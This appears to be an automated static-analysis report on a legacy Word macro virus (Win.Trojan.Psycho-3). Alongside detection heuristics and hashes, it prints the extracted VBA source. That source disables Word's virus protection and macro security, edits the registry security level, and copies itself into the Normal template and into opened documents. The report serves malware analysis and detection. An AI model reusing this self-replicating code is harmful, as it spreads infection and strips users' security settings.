Win.Trojan.Psycho-3 — Office (OLE) malware analysis

Static analysis result for SHA-256 3627de818d3a029f…

MALICIOUS

Office (OLE)

Size: 40.5 KB
Created: 2002-06-13 16:54:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: a60ac6952d05a45cd0414fcc15ee0abb
SHA-1: 53d3904e5170ed5234045e352e4f7f625be3e26d
SHA-256: 3627de818d3a029f0cdc53aa05423f963fee4789b962e28c5b3f95df99eee7dd
Risk score: 260

Malware Insights

Win.Trojan.Psycho-3 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The file exhibits characteristics of a legacy WordBasic macro virus and contains VBA macros, specifically AutoOpen and Auto_Close, which are commonly used to initiate malicious execution upon document opening. ClamAV detections indicate it is a known trojan, identified as Win.Trojan.Psycho-3 and Win.Trojan.wmvg-1 on an extracted artifact. The VBA script appears to be designed to infect other documents and potentially spread.

Heuristics 5

  • ClamAV: Win.Trojan.Psycho-3 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • Legacy WordBasic macro-virus markers (severity: high, rule: OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 2 related findings)
    Document contains VBA macro code
  • AutoOpen macro (severity: high, rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Auto_Close macro (severity: high, rule: OLE_VBA_AUTOCLOSE)
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13636 bytes
SHA-256: 59ca8288bc1e764391feaed8cae280bc4b35ac3f3f75afedd0c2cbac8499454b
Detection
ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "DPMmay2000"
Sub ToolsMacro()
'Create by Yean Sin from DPM May 2000 TARC(Kampar, Perak)
'The purpose is to delete another virus on the computer lab
End Sub
Sub ViewVBCode()
End Sub
Sub FileTemplates()
End Sub
Sub DisPrompt()
    Options.SaveNormalPrompt = False
    Options.SavePropertiesPrompt = False
    Options.VirusProtection = False
End Sub
Sub ToolsOptions()
On Error GoTo StopExit
    Options.SaveNormalPrompt = True
    Options.SavePropertiesPrompt = True
    Options.VirusProtection = True
    Dialogs(wdDialogToolsOptions).Show
    DisPrompt
StopExit:
End Sub
Sub InfactAc()
On Error GoTo StopExit
    Dim AcInfacted As Boolean
    AcInfacted = False
    For Each Obj In ActiveDocument.VBProject.VBComponents
        If Obj.Name = "DPMmay2000" Then AcInfacted = True
        If Obj.Name <> "DPMmay2000" And Obj.Name <> "ThisDocument" Then
            Application.OrganizerDelete Source:=ActiveDocument.FullName, _
            Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems
        End If
    Next Obj
    Nor = NormalTemplate.FullName & "CCIP/DPM"
    Ac = ActiveDocument.FullName & "CCIP/DPM"
    If AcInfacted = False Then
        Application.OrganizerCopy Source:=Left(Nor, Len(Nor) - 8), _
        Destination:=Left(Ac, Len(Ac) - 8), Name:="DPMmay2000", _
        Object:=wdOrganizerObjectProjectItems
        ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
    End If
StopExit:
End Sub
Sub InfactNor()
On Error GoTo StopExit
    Dim NorInfacted As Boolean
    NorInfacted = False
    For Each Obj In NormalTemplate.VBProject.VBComponents
        If Obj.Name = "DPMmay2000" Then NorInfacted = True
        If Obj.Name <> "DPMmay2000" And Obj.Name <> "ThisDocument" Then
            Application.OrganizerDelete Source:=NormalTemplate.FullName, _
            Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems
        End If
    Next Obj
    If NorInfacted = False Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, _
        Destination:=NormalTemplate.FullName, Name:="DPMmay2000", Object:=wdOrganizerObjectProjectItems
        NormalTemplate.Save
    End If
StopExit:
End Sub
Sub Clear97()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
  CommandBars("Macro").Controls("Security...").Enabled = False
  System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
  CommandBars("Tools").Controls("Macro").Enabled = False
  Options.ConfirmConversions = (5 - 5): Options.VirusProtection = (3 - 3): Options.SaveNormalPrompt = (2 - 2)
End If
Set AcDoc = ActiveDocument.VBProject.VBComponents.Item(1)
Set NorDoc = NormalTemplate.VBProject.VBComponents.Item(1)
AcDocLine = AcDoc.CodeModule.CountOfLines
NorDocLine = NorDoc.CodeModule.CountOfLines
If AcDocLine <> 0 Then
    AcDoc.CodeModule.deleteLines 1, AcDocLine
End If
If NorDocLine <> 0 Then
    NorDoc.CodeModule.deleteLines 1, NorDocLine
End If
End Sub
Sub Inf()
    InfactNor
    InfactAc
    Clear97
End Sub
Sub FileOpen()
On Error Resume Next
    WordBasic.DisableAutoMacros True
    If Dialogs(wdDialogFileOpen).Show <> 0 Then
        Inf
    End If
    WordBasic.DisableAutoMacros False
End Sub
Sub AutoOpen()
On Error Resume Next
    DisPrompt
    Inf
End Sub
Sub AutoClose()
    DisplayMsg
End Sub
Sub DisplayMsg()
On Error GoTo StopExit
If Day(Date) = 13 Then
    For i = 0 To 1300
        Beep
    Next
    MsgBox "                We have finished DPM course in 2001 with" & vbCrLf & _
           "             the help of all CCIP and DPM course Lacturers," & vbCrLf & _
           "         we would like to express our highest gratitude to them." & vb
... (truncated)